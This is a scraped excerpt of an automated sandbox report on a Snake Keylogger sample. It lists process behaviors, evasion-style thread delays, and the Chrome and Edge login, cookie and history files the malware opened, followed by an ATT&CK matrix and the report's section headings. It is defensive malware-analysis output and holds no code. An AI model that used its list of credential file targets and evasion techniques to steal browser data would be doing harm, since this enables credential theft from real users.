Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599170	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598941	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598777	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598667	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598560	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596482	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596262	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596153	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595820	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595358	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594265	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7722			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1918			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6924	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6924	Thread sleep count: 1713 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6924	Thread sleep count: 8137 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -599170s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -599062s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -598941s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -598777s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -598667s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -598560s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -596482s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -596374s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -596262s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -596153s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -596046s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -595820s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -595468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -595358s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -595249s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -594921s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -594593s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -594484s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -594375s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904	Thread sleep time: -594265s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6236	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: powershell.exe, 00000001.00000002.1189296404.0000000005858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\Ar
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.1189296404.0000000005858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\Ar
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.1189296404.0000000005858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\Ar
Source: msiexec.exe, 00000003.00000002.2179525179.000000000472A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2179525179.0000000004788000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2182251034.0000020CE805A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2179073129.0000020CE2A2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	API call chain: ExitProcess graph end node			graph_0-3937
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	API call chain: ExitProcess graph end node			graph_0-3942

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	41 Virtualization/Sandbox Evasion	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4PYRGCo1Di.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
4PYRGCo1Di.exe